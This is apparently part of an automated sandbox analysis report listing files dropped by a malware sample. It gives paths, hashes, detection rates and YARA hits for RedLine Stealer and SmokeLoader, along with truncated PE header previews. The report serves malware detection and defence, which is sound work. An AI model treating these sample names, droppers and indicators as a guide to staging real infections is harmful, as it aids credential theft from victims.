SSDEEP:	6144:5UjYN/6sbkIZ7Q5GKsLs2OErRWrOO+zfi0q:qjI/68krSrRWZ0
MD5:	1C3ECED439962F3570F523D9AF5FB908
SHA1:	4BF23AD43EE572ABD2C85418939793FFBCD444D3
SHA-256:	7ACF0EBA2165FCDFC72338959E9ADD02C362918C8451A0313C4EF797AE337ABD
SHA-512:	BC4D4FC365609BCC1B112E9C09BC9C7C7B9AC523120CC4F997E98639A22FF0AC3860CCAE067E558E067C36DA18E445FC3C724622E1891DD2F5A61A05AC96AC37
Malicious:	true
Antivirus:	Antivirus: Avira, Detection: 100% Antivirus: Joe Sandbox ML, Detection: 100% Antivirus: ReversingLabs, Detection: 92%
Reputation:	unknown
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......>..oz`f<z`f<z`f<d2.<Y`f<d2.<k`f<d2.<3`f<.o;<y`f<z`g<+`f<s..<{`f<s..<{`f<Richz`f<........PE..L....+Ue.............................B............@.............................................................................(....................................................................................................................text............................... ..`.rdata..j).......*..................@..@.data...............................@...................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\61F6.exe

Download File

Process:	C:\Windows\explorer.exe
File Type:	PE32+ executable (GUI) x86-64 (stripped to external PDB), for MS Windows
Category:	dropped
Size (bytes):	18374656
Entropy (8bit):	6.439144908607428
Encrypted:	false
SSDEEP:	98304:8+kKOOaV3XkVAvBscyI37T6UZcpNEfaR8u07FnQpUBqAS7gKUQtW0:8hXLAQTTZRfas7FQd7P1tW
MD5:	D6A28FAB04ACEC60305A5C6BE5B105D2
SHA1:	8DEF206AF9E2E8F463F15A2874B53C295FD28710
SHA-256:	FF8973E265CDE0ECFC91CB81AE4AF75946B2CFCAA772B5CD1390C176E788175F
SHA-512:	3406EC32344B3FFEDC6295D10256920CB43DD511500473974400A3602B1B9D734B9A2439CC65DDE64C7FAE00CBE084812B3188CDE78A7C8D75650EF8690A0212
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 67%
Reputation:	unknown
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..d......................$.....\.................@.....................................Y....`... .........................................Y............P.......`..``...........p..."..........................`H..(....................................................text...............................`.``.data........ ......................@.`..rdata..............................@.`@.pdata..``...`...b...:..............@.0@.xdata...k.......l..................@.0@.bss.........@........................`..edata..Y...........................@.0@.idata..............................@.0..CRT....p....0.......&..............@.@..tls.........@.......(..............@.@..rsrc........P.......*..............@.0..reloc..."...p...$...<..............@.0B................................................................................................................................

C:\Users\user\AppData\Local\Temp\7FE0.exe

Download File

Process:	C:\Windows\explorer.exe
File Type:	PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	227328
Entropy (8bit):	5.995590529614359
Encrypted:	false
SSDEEP:	3072:Nyng4InXNgcy9Wy3aPGcntCTt/qhGFlvDYLXZiTtzr:Kg/XNgcWr3aPu/5FlvDYLpqt
MD5:	9E41D2CC0DE2E45CE74E42DD3608DF3B
SHA1:	A9744A4B76E2F38A0B3B287EF229CBEB8C9E4BA6
SHA-256:	1081D313FE627CA22CE02C7BD8D33ECE52B1E2CC8978F99653671F94175CAF8F
SHA-512:	849673924BDB3DB9A08C2FF4A510AF599539531E052847CAAF8A2D47F91497BEDAF48714A3A6CDEE1C0F5B8A8B53054C91564267BE2C02DE63446E207A78F9EA
Malicious:	true
Antivirus:	Antivirus: Avira, Detection: 100% Antivirus: Joe Sandbox ML, Detection: 100% Antivirus: ReversingLabs, Detection: 92%
Reputation:	unknown
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...t/................0.................. ........@.. ....................................@.....................................O.......^............................................................................ ............... ..H............text...4.... ...................... ..`.rsrc...^...........................@..@.reloc...............v..............@..B........................H........`.............`_..............................................e.....ix;..._w....{B..ViU4.db..<P.d.$.t...d..(.N...6V...V..R..WU(.j].L......-.1...k.W>.&...t.;......"[.K!.`.....A.w1G......1..."6....N.e...`N......"Y1lkhA.P..>U.k....(q....1b..:`y...k.<...av..".F.....Z#&.Mb.g.5....g.[....NV..w....J.N....{.q...(r..t.3a.:G.f.y2....c.q..yXd....z.+...HJ,.:.&+.-.,.7.7...C...)=..B..;.....@h.....P%.1k....H&..54._.....S..e..'..)...n.(...$.JH..4.F"Biw...T...

C:\Users\user\AppData\Local\Temp\82379071-b348-4664-a1ff-3da4ad77e83e

Download File

Process:	C:\Users\user\AppData\Local\Temp\8427.exe
File Type:	SQLite 3.x database, last written using SQLite version 3042000, file counter 11, database pages 7, cookie 0x3, schema 4, UTF-8, version-valid-for 11
Category:	dropped
Size (bytes):	28672
Entropy (8bit):	2.5793180405395284
Encrypted:	false
SSDEEP:	96:/xealJiylsMjLslk5nYPphZEhcR2hO2mOeVgN8tmKqWkh3qzRk4PeOhZ3hcR1hOI:/xGZR8wbtxq5uWRHKloIN7YItnb6Ggz
MD5:	41EA9A4112F057AE6BA17E2838AEAC26
SHA1:	F2B389103BFD1A1A050C4857A995B09FEAFE8903
SHA-256:	CE84656EAEFC842355D668E7141F84383D3A0C819AE01B26A04F9021EF0AC9DB
SHA-512:	29E848AD16D458F81D8C4F4E288094B4CFC103AD99B4511ED1A4846542F9128736A87AAC5F4BFFBEFE7DF99A05EB230911EDCE99FEE3877DEC130C2781962103
Malicious:	false
Reputation:	unknown
Preview:	SQLite format 3......@ ..........................................................................j..........g...$......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\8427.exe

Download File

Process:	C:\Windows\explorer.exe
File Type:	PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	419840
Entropy (8bit):	5.287282390724775
Encrypted:	false
SSDEEP:	12288:YRz22kP289h1DKKo/fFERMWARF0LwpgpfNXUeZj1s7JuQd3pEcIxH7PYGwwTYrEq:Yp2Wb
MD5:	E2CD9DED5E36DF514FCDCC80134EEBDD
SHA1:	E3FFAADCEDA6B8FA27C701E160F2C832299F90D3
SHA-256:	1B24E390B7DCD52CFDFA2A1307631138F91539824F1526F0FE5A4A2273305926
SHA-512:	7EBEC6177A2FB2BCF282905F85065B232F96E9EE043247FCECFABD0FB26357C3944D31223DC5C0D93190AFF3A9EDE1EABD66D4C2D89EB0CC44288C7EEA62F717
Malicious:	true
Antivirus:	Antivirus: Avira, Detection: 100% Antivirus: Joe Sandbox ML, Detection: 100% Antivirus: ReversingLabs, Detection: 61%
Reputation:	unknown
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...R.A..........."...0..]...........\|... ........@.. ....................................`.................................X\|..J....................................\|..8............................................ ............... ..H............text....]... ...^.................. ..`.rsrc................`..............@..@.reloc...............f..............@..@.................\|......H...........t.......r...................................................Q..P~AeS....:'^.;.k...E..X.K... 0.U.vm...v...L%O......&5D..b...ZI%..gE...]..../u..L...F..k....._......mz.RY...-Xt!.I.i)...Du.j.yx.X>k'.q..O...... .f}.:.c.J...1..Q3`bS.E.dw.k........+.pHhX.E....l.R{...s.#rK.....WfU...(./.....{..7..0(..#.....j....\...+.y......Ni.e........4b....4.S...U....2...u...9@`.^q...n.Q>!.....=.>..M.F.T..q.]....o`P.....$..@C.g.w..B.......[8y...\|.G\|B..............2+.H

C:\Users\user\AppData\Local\Temp\853C.exe

Download File

Process:	C:\Windows\explorer.exe
File Type:	PE32+ executable (GUI) x86-64 (stripped to external PDB), for MS Windows
Category:	dropped
Size (bytes):	17352704
Entropy (8bit):	6.472163087973395
Encrypted:	false
SSDEEP:	98304:FvG9rmVeIAfg1In0yy8iSmXPQinpYyIvAAtLBJe1uqEerMZaqAmTWpYzXJcgOQN1:FXJqny8iWAsLBJeserMKA5xNoQ
MD5:	234F10ADF43FC8B9C00F39224B652A99
SHA1:	05B410750DE831AEACCF5A5773E55CD47AEB047C
SHA-256:	9238C171562445544CE308ADC17671989161094CE95D984BDA7C3A7D8B92136B
SHA-512:	74E6A876FC417D977ED9CBBD2ACD43CA46EDAD9D25C5617B74179D6622C675CF26FA6E6BA5BB6AF8E35B6C64A83816F08192FDDCD8452B8DD6915E62EDAD13C0
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 13%
Reputation:	unknown
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..d......................$.hl....................@............................. .......-....`... .........................................N.......d............................0..................................(...................d...(............................text...pgl......hl.................`.``.data...p.....l......ll.............@.`..rdata...v...@s..x...&s.............@.`@.pdata..............................@.0@.xdata..............................@.0@.bss..................................`..edata..N...........................@.0@.idata..d...........................@.0..CRT....p...........................@.@..tls................................@.@..rsrc...............................@.0..reloc.......0......................@.0B................................................................................................................................

C:\Users\user\AppData\Local\Temp\8F82.exe

Download File

Process:	C:\Windows\explorer.exe
File Type:	PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	114176
Entropy (8bit):	5.356715396410593
Encrypted:	false
SSDEEP:	3072:sHhVMpN63m30tj7p9bqUrH1sCe5wQUGXnUAjNY7:sHAbrep9bqAIXnUw
MD5:	52CC4016261C2CC9311F48B4D84C8D4E
SHA1:	E9B87D50469953CF6A819542F3B8298DF3606BED
SHA-256:	3F196CBD8FD145E02535D112D35E7F4952286DD5BF033FC88534AF567EB78843
SHA-512:	05F715BDF642F89C115A80EABE3CDE7B0F2BC40E46B9487F833D12193E87104852092075F8D4277CE2044EAEAE282F2C785384F31620E60C31DC83BD9F433681
Malicious:	true
Antivirus:	Antivirus: Avira, Detection: 100% Antivirus: Joe Sandbox ML, Detection: 100% Antivirus: ReversingLabs, Detection: 83%
Reputation:	unknown
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...&.x..........."...0.................. ........@.. ....................... ............`.....................................S.................................................................................... ............... ..H............text........ ...................... ..`.rsrc...............................@..@.reloc..............................@..B........................H.......`...8.......7...8...%...........................................PK..........................................5...P...n...w...{...................................................................\|.......................8...K.......................[......."...#...&...'...........=.......F.......8...............2...p...s...a............ ...#...'...+...c...i...i...i...i..PK......PK......PK......PK..F...o .....(t....".(u.....s,.........(&....~(....ow....!...~!...(5....".

C:\Users\user\AppData\Local\Temp\9AED.exe

Download File

Process:	C:\Windows\explorer.exe
File Type:	PE32 executable (console) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	453908
Entropy (8bit):	6.47536181891999
Encrypted:	false
SSDEEP:	6144:eTCq1+q0kSyJF6/M8jEkYTEK8d9ipLfq+7ZEvqH9qKDs4Y75K1:iCqc5yJF6kP8epLi7vqXDs4YlK1
MD5:	FF4691F6C1F0E701303C2B135345890E
SHA1:	83AA8EE0CC57AF54EBAB336C70D756A5A8C2F7D4
SHA-256:	06CF4C8C1B6AA436DFFF3EC427DBE4AE291D170A0AD7445003995BBF6CCB21CA
SHA-512:	7A909DC95F019FB60DA7751A888D11CB82F751560408CD47A7FDAB53F92971690DF5D9E8CDDC9CD7CFA7C5949FF789683183C2271C5249403AA8322CFA1BCEE6
Malicious:	true
Antivirus:	Antivirus: Joe Sandbox ML, Detection: 100% Antivirus: ReversingLabs, Detection: 54%
Reputation:	unknown
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..........~X.m-X.m-X.m-F..-L.m-F..-..m-F..-..m-..0-[.m-X.l-..m-Q..-Y.m-Q..-Y.m-RichX.m-................PE..L...hDVe............................ZP....... ....@..................................z......................................).......................<.... ........................................................... ...............................text............................... ..`.reloc..Z........0.................. ..`.rdata...<... ...>..................@..@.data...xx...`...n...R..............@....bqwrxyb.................................rcqwrbs........<......................@................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\C4AD.exe

Download File

Process:	C:\Windows\explorer.exe
File Type:	PE32+ executable (GUI) x86-64 (stripped to external PDB), for MS Windows
Category:	dropped
Size (bytes):	17031168
Entropy (8bit):	6.423405932715526
Encrypted:	false
SSDEEP:	98304:Te9Lbf47rATGbs+EselMAPC/cLWMLy/JuSE+fAKwlHB3bLDk6k:TawgSbsP5gALI48GHtDk
MD5:	03205A2FE1C1B6C9F6D38B9E12D7688F
SHA1:	5F7B57086FDF1EC281A23BAAAF35CA534A6B5C5E
SHA-256:	8E84C3F1E414895725A5960853EB72990A02C488D76AB5C65CED8A539DCE2ECD
SHA-512:	96885920251F66C550E5ECA6D9CB7F667A690375039A2D45E4EDE035495FB5CDD685D4A905250E21176B5423880B366EF8FD13E720FB5911D9F7DD94E1DCB03F
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 33%
Reputation:	unknown
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..d......................$.hl....................@.............................0......a.....`... .........................................N.......d.... .......................@.. ...........................`...(...................d...(............................text....gl......hl.................`.``.data...p.....l......ll.............@.`..rdata..p....@s......&s.............@.`@.pdata..............................@.0@.xdata..............................@.0@.bss..................................`..edata..N...........................@.0@.idata..d...........................@.0..CRT....p...........................@.@..tls................................@.@..rsrc........ ......................@.0..reloc.. ....@......................@.0B................................................................................................................................

C:\Users\user\AppData\Local\Temp\D9EC.exe

Download File

Process:	C:\Windows\explorer.exe
File Type:	PE32+ executable (GUI) x86-64 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	1057280
Entropy (8bit):	7.924938247150688
Encrypted:	false
SSDEEP:	24576:hIFFFdzxPNuJtdzWU6INU04XH7yTOp0ee8rhQpLN99BiWL2lE:hI9FxVuJtdCU6O+G6p0niYLN9xL
MD5:	2A42D97ACFD504A4E15577F165F63A40
SHA1:	27E02A04A4772B3500F16348D3A6C28B60E346C0
SHA-256:	3F26B871B1E556D19B67814D3A758316B655CD508BE014A2EEA2CF40E1371B94
SHA-512:	0212681E8E4A9725E6C338BB84506D7D8BC05B8895E633B17A67FEF93E604BA8A6282ACD77A33A65F8791F830D750841C540D81538BB5BBA4798462C2D481AC0
Malicious:	true
Antivirus:	Antivirus: Joe Sandbox ML, Detection: 100% Antivirus: ReversingLabs, Detection: 21%
Reputation:	unknown
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..d....We.........."...................... ....@...... .......................`............`..........................................................@............................................................................................... ..H............text...`.... ...................... ..`.rsrc........@......................@..@........................................H........-...................8...........................................0..........(t.....0../.........(....}.......}......\|......(...+..\|....(......0..7.........(....}.......}.......}......\|......(...+..\|....(......0..X........{......,>..;....(....o.......(....-?..%.}......}.....\|.......(...+......{......\|............%.}......(....(....(.......(....u.... .\|..(h...o....(..........(......(....u.... 0z..(h...(......(......(....(....(....o........(....->..%.}.......}.....\|.......(.

C:\Users\user\AppData\Local\Temp\GtxAoNQLNDxAZTy.data

Download File

Process:	C:\Users\user\AppData\Local\Temp\C4AD.exe
File Type:	PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	274768
Entropy (8bit):	6.317281400055364
Encrypted:	false
SSDEEP:	6144:muBQ7WNgcHiGrSmVG0KtQSpKE0dIvnLA0:mu1NgcHiGrgnKE0dU9
MD5:	097E99BAB640E8EBBF53F2B648DC703B
SHA1:	4AC18B065B8A669A73ECEE9BE46D681FB2A33281
SHA-256:	BB46F69B3B7627CD7833E994F45E13DAB88BBE6038B27DC4B4085E5F0385BEA5
SHA-512:	9DD5BB23B5833248D8397B0016E8BA3691DB26CCDE16B4915FBDB19A9FF19E8C53240F48D3F5404359F81E8E7EC5AB26E5140CCBC1B0F53E2087575DC496C125
Malicious:	true
Yara Hits:	Rule: JoeSecurity_RedLine, Description: Yara detected RedLine Stealer, Source: C:\Users\user\AppData\Local\Temp\GtxAoNQLNDxAZTy.data, Author: Joe Security
Antivirus:	Antivirus: Avira, Detection: 100% Antivirus: Joe Sandbox ML, Detection: 100%
Reputation:	unknown
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...w"................0.............n.... ........@.. ....................................@.....................................W.......V............................................................................ ............... ..H............text...t.... ...................... ..`.rsrc...V...........................@..@.reloc...............l..............@..B................P.......H.......Tb...\|...........a..............................................M.Z.B...O.NK.Z.......g..y..........zO.0WW"..O...2..\....8..=.i. u.<.A.8.....{.Y.L.4...C....(u....$....x7\|..d:.....Vd.}iG....\.^.......yHM.\|B3.".{#....JJ...ve..~,.....Z,^...;'.5....H....3..]?iV3.Ki._..x^Xm..Z.H+.+.t.A0..p..D..a..m.!M..e..6.K..J.L..fB..$GCY......e.N!.e.I.~E....d.x...~k.....:..?...b1.z({`+.'...N7.qy.aC......>.....E"..a\|..B...K6..xd.Q.5.k..M..\|...%;...{a.W.....o.;d....

C:\Users\user\AppData\Local\Temp\IXP000.TMP\6rR8iy1.exe

Download File

Process:	C:\Users\user\Desktop\jtfCFDmLdX.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	194048
Entropy (8bit):	7.234032449497489
Encrypted:	false
SSDEEP:	3072:jDKW1LgppLRHMY0TBfJvjcTp5X2QyRk9Bo7KWH2yHsGeB:jDKW1Lgbdl0TBBvjc/EIBr42fb
MD5:	F4AF3A9BB5B128EA7F4A49016AE8DE1F
SHA1:	77E47932AF41B3AF5BFFF73D2A4C9773DC224F0D
SHA-256:	195FA6FF08DD55FF8F112C0323885BC06E1D28CE38EDAE26CCE1E33B23337FF1
SHA-512:	1067017DA68040E8E1EAB228773C37CBA180731F8792462D94E1E52CC12EB63E5306B3FFBC1FB4F0047A9D29E8A060649B5914BB25ECE9C2C37B75E143C50DF2
Malicious:	true
Yara Hits:	Rule: JoeSecurity_RedLine, Description: Yara detected RedLine Stealer, Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\6rR8iy1.exe, Author: Joe Security Rule: MALWARE_Win_RedLine, Description: Detects RedLine infostealer, Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\6rR8iy1.exe, Author: ditekSHen
Antivirus:	Antivirus: Avira, Detection: 100% Antivirus: Joe Sandbox ML, Detection: 100% Antivirus: ReversingLabs, Detection: 75%
Reputation:	unknown
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......h..-,q.~,q.~,q.~2#.~?q.~...~+q.~,q.~\q.~2#n~.q.~2#i~.q.~2#{~-q.~Rich,q.~..................$e....PE..L...t..P..........#..........Z....../.............@..........................@.......;..........................................P....`..T...............................................................@............................................text............................... ..`.rdata...m.......n..................@..@.data....0... ......................@....rsrc...T....`....... ..............@..@................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\IXP000.TMP\TE0FN83.exe

Download File

Process:	C:\Users\user\Desktop\jtfCFDmLdX.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	1417728
Entropy (8bit):	7.96295227138128
Encrypted:	false
SSDEEP:	24576:YytxsQucJiYUan0+Q+JNjIXc78HoAzQoPJ9E5SwdlPCZEz:f/sQxJiBa00NUc78HoADPJu/Pn
MD5:	272E0DC32730BC6AC7850C8C7BA31B61
SHA1:	E49E6894B08DB4CF8BF50EC55F101336D63F234D
SHA-256:	9D064EFFE1B935DB75BF45C13985820A7F3D2A455DB3A85EA43153ECF29197EA
SHA-512:	94FE9119780778946C7D531A8A5CFA6C180951B358BC5907A7223D601C738D5809C12D8A136877D28175C98C4CDD3C9B513C1EC886EF3E82E006C32BD18E745B
Malicious:	true
Antivirus:	Antivirus: Avira, Detection: 100% Antivirus: Joe Sandbox ML, Detection: 100% Antivirus: ReversingLabs, Detection: 51%
Reputation:	unknown
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........%...K..K..K...N..K...H..K...O..K...J..K..J...K...C..K.....K...I..K.Rich..K.........PE..L....`.b.................d...:......`j............@.......................................@...... ......................................................................T...............................@............................................text....c.......d.................. ..`.data...H............h..............@....idata..R............j..............@..@.rsrc.... ...........\|..............@..@.reloc..............................@..B........................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\IXP001.TMP\5zQ4dC4.exe

Download File

Process:	C:\Users\user\AppData\Local\Temp\IXP000.TMP\TE0FN83.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	37888
Entropy (8bit):	7.001465066339261
Encrypted:	false
SSDEEP:	768:f8FhylJE+hwr5hN7F0I0bQyvUgq65DQVi:f8qlJEQwrDNuIyvD5sV
MD5:	0347EA57AB6936886C20088C49D651D2
SHA1:	8E1CB53B2528B0EDD515FD60FE50FDE8423AF6D2
SHA-256:	9CD2A65EAAD5BE25FCF2F3C80070F42D6DE27E2296857AD7B65E98BE2AF217A2
SHA-512:	55507702A488C9C20C783CC731722EF7B7C5AF4A8890FE838F59F79266262304B3515C93E66FC16AA701DDB40233CEE58BCC11873A88280B99E4D6876EA4C3DB
Malicious:	true
Yara Hits:	Rule: JoeSecurity_SmokeLoader_2, Description: Yara detected SmokeLoader, Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\5zQ4dC4.exe, Author: Joe Security
Antivirus:	Antivirus: Avira, Detection: 100% Antivirus: Joe Sandbox ML, Detection: 100% Antivirus: ReversingLabs, Detection: 88%
Reputation:	unknown
Preview:	MZ..............@.......@...............................................!..L.!This program cannot be run in DOS mode...$........PE..L.....Ue...............H.............2............@.................................%................................................................................................................................................................text............................... ...................................................................................................=?...C...?....r..9CL6(k..El..?.?e..v%.q.v.. .[..6......"m...B...Z.U...P(.......l....n.J.?..W.y.w....^.E.g...o.3...R.+.!>I.lU..C.9K............Yb..l{.F....ve...}.i.L..%)l.......d.{....Nv.6.}..9..]....P9....}.....{.V.(dE....3.0..Y......R...-kx...Q'b7.!..z"n..&1...J...e.......GS.yfs;...&~...g.R.....0.;].......`.........iVV)...sA.^.h...5.,.$...`z..u.4....Qx........U.8.....[......E....C:.m....x.?...7.~....7.....,.:\|......h(.W ...m......[6.r....yK.p.D

C:\Users\user\AppData\Local\Temp\IXP001.TMP\Tg9kb35.exe

Download File

Process:	C:\Users\user\AppData\Local\Temp\IXP000.TMP\TE0FN83.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	1291776
Entropy (8bit):	7.952163518913915
Encrypted:	false
SSDEEP:	24576:xyG9WNv6nSf+pB06X9M87vA+QfPJFr53wzlbEWoeZ9:kZN6SaX9M87vAdPJsxbno
MD5:	2E13B79FB62E2F3B5B2038A0298578D1
SHA1:	A6C71E2ACBB9D422853EF6A6584AA9619D700D20
SHA-256:	620ED3EC40E3C1D346E49A6D7CC530A445B0589B5842703952AF97F884195386
SHA-512:	C7EB0719363138F113439EFA0F4EEBD61F27A453034E2E792099E1BA3FC5DAAE0B0106954383FDC4AB08D475FF869B448E6A3B338C2A4EE3081A02A06FF129F1
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 32%
Reputation:	unknown
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........%...K..K..K...N..K...H..K...O..K...J..K..J...K...C..K.....K...I..K.Rich..K.........PE..L....`.b.................d...N......`j............@.......................................@...... ......................................8/..............................T...............................@............................................text....c.......d.................. ..`.data...H............h..............@....idata..R............j..............@..@.rsrc....0.......0...\|..............@..@.reloc..............................@..B........................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\IXP002.TMP\2zx1310.exe

Download File

Process:	C:\Users\user\AppData\Local\Temp\IXP001.TMP\Tg9kb35.exe
File Type:	PE32 executable (console) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	2074168
Entropy (8bit):	5.633161901692625
Encrypted:	false
SSDEEP:	24576:lM7BU2JApE013tn/g+Bx+MLnx726a9Dhvh1F+MMa5:lM7wE013tn/Lx+Z6a3vHz5
MD5:	4CA9AC47A5200585D4F6693B30CED951
SHA1:	146F478D5E3067E8DB83A352FEB57666F0E6339F
SHA-256:	A3340C3CEC91FE488262BFD7915B5D1FE6185D8278344B7DEF376DE1FDEA4082
SHA-512:	BD552610A82D9BADB6DE7757C0D96E107DEC6CB65BC67B1649DEB7AAD245907E6F1BE3CCC7A4E315916466B84756B75D7E55003E317E24153977AE21AB81AE85
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 32%
Reputation:	unknown
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......G.5...[...[...[..X...[..^...[.._...[..Z...[...Z...[.L.^.^.[.L._...[.L.X...[...[...[..[...[..Y...[.Rich..[.........................PE..L.....We..............."..........................@.......................................@..........................L..b...T...d....................~..8(...P...p......8...................L..........@...............T............................text...I........................... ..`.rdata..............................@..@.data........P...t...B..............@....idata..............................@..@.dmm............. ..................@....tls.........0......................@....00cfg.......@......................@..@.reloc..2....P......................@..B........................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\IXP002.TMP\4ZZ099qJ.exe

Download File

Process:	C:\Users\user\AppData\Local\Temp\IXP001.TMP\Tg9kb35.exe
File Type:	PE32 executable (console) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	3394104
Entropy (8bit):	6.097077671992495
Encrypted:	false
SSDEEP:	49152:PMbwMc13tn/rx+h6a3vH9TOPwihRnqOp7usY1:kux+oGTelZp7us0
MD5:	E7F331448A92EE19814902733D0F6E58
SHA1:	C0A186B2F4DBD0CBA318444270B319BD50838F66
SHA-256:	A3F898C6B2D6C0C04045AA864F39F2FFD220178DDE2AB2B4A035CE4175700831
SHA-512:	E4FB3E9FFD90D5C43FD1ED32C698FD21816963E7EB87797777DBDC5CA9D19A33D1784EF1821D344747089783C7CE55B13A1DB222058B4914EBB7E90EC1EC7A1F
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 35%
Reputation:	unknown
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......G.5...[...[...[..X...[..^...[.._...[..Z...[...Z...[.L.^.^.[.L._...[.L.X...[...[...[..[...[..Y...[.Rich..[.........................PE..L....We...............".....0&...................@...........................4...........@..........................L..b...T...d.....................3.8(...p3..p......8...................L..........@...............T............................text...I........................... ..`.rdata..............................@..@.data........P...t...B..............@....idata..............................@..@.dmm.....5.......6..................@....tls.........P3.......3.............@....00cfg.......`3.......3.............@..@.reloc.......p3.......3.............@..B........................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\InstallSetup5.exe

Download File

Process:	C:\Users\user\AppData\Local\Temp\39D.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows, Nullsoft Installer self-extracting archive
Category:	dropped
Size (bytes):	2311455
Entropy (8bit):	7.9964582250147425
Encrypted:	true
SSDEEP:	49152:zc22s5FXQ4EmojLjCRELVf7Avil+dHIsLp1thIikN+6u2hsX:zcWzX71oDCRAZUviAHImDqia7hsX
MD5:	7714DFF962CF31AF75ABF7F7A58166EF
SHA1:	7CCC3E3189BB80BBCEDF144A49D8DCDBE93BB9E4
SHA-256:	377105F73402F4147AE87A6432EAD4892202E4392991D8D70F8073608C1A46F4
SHA-512:	FF7AA6865CEA87870DAB45AAC7AE98F799952B56AACD15B55B610994675AE1C1F4ED3600D8BF098BF988BF87F59163FDED37DEFA5ACF2E9A6E4073C8EB469F1F
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 39%
Reputation:	unknown
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........1 ..PN..PN..PN._...PN..PO.JPN._...PN.s~..PN..VH..PN.Rich.PN.........................PE..L...l.d.................j..........25............@.......................................@..........................................P..8............................................................................................................text....h.......j.................. ..`.rdata..d............n..............@..@.data...............................@....ndata.......P...........................rsrc...8....P...0..................@..@................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\System.Data.SQLite.EF6.dll

Download File

Process:	C:\Users\user\AppData\Local\Temp\8427.exe
File Type:	PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	201528
Entropy (8bit):	6.037117497326589
Encrypted:	false
SSDEEP:	3072:9Nh7rnOCmxzBE91M+I1X+IZ/6KP8czmLhL:9b7Zmx1E91AuQ6KP8c
MD5:	6F69454F7206EB6FB00B1F15D13718D9
SHA1:	C1472AD5C91DA5E729BF419B8546657B2152915C
SHA-256:	857A287F7F39097C2F70FF0CE681D35196DAEE60B43F255BC72B842A351208C4
SHA-512:	27C193CB2D25938BC508312C38932A25D63A8ECF49C9AF6AD2819D1291F44F2B4435725DFEF2DDED2E0F3415AA73C8AF276084899302F8B196A993DDE85AE095
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Reputation:	unknown
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....p.a.........." ..0.............r.... ........... .......................@.......)....`................................. ...O.......................8A... ....................................................... ............... ..H............text........ ...................... ..`.rsrc...............................@..@.reloc....... ......................@..B................T.......H........................W..p...h........................................0..,.......~....s .......o!......r...pso.....r...po"...&.o#...o$....o%....o&...&...r/..po"...&.o'...o(....+A.o)...t.....,...+..r9..po"...&%o....o%....r?..po"...&o+....o%....o....-....,..o......,.........os........o,...o"...&.rG..po"...&.o&...&.rQ..po"...&.o-....o%....r_..po....&....o!....(......op...Q.o/...*......_.M........0..n.......~....s ...%..rc..pso....%r...po"...&.o#...o$....o%...%o&...&%rQ..po"

C:\Users\user\AppData\Local\Temp\System.Data.SQLite.Linq.dll

Download File

Process:	C:\Users\user\AppData\Local\Temp\8427.exe
File Type:	PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	201520
Entropy (8bit):	6.040084008872652
Encrypted:	false
